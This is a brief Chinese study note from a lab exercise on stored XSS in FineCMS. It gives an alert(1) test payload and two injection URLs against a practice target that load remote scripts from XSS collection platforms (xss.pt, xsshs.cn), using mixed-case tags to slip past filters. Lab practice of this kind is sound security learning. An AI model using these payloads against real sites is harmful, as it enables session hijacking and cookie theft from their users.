title: “存储型xss”
author: “年轻人”
date: “june 26th, 2021”
存储型xss
xss
提交恶意xss数据,存入应用服务器端,用户访问时被触发
而检验是否存在xss可以通过使用xss弹窗检验<script>alert(1)</script>
防止窃取cookie:http-only(js不能传递cookie)
cms相关漏洞:
/index.php?c=mail&m=chen<script>alert(1)</script>
检验是否存在漏洞
靶场作业
第一步:xs.sb用临时邮箱注册账号, 创建项目,选择基础默认模块
第二步:查找finecms的xss漏洞
/index.php?c=mail&m=a<script>alert(1)</script>
运用xss平台
http://59.63.200.79:8082/index.php?c=mail&m=123<sCRiPt sRC=https://xss.pt/JNRZ></sCrIpT>
http://59.63.200.79:8082/index.php?c=text&m=<sCRiPt sRC=//xsshs.cn/pp4O></sCrIpT>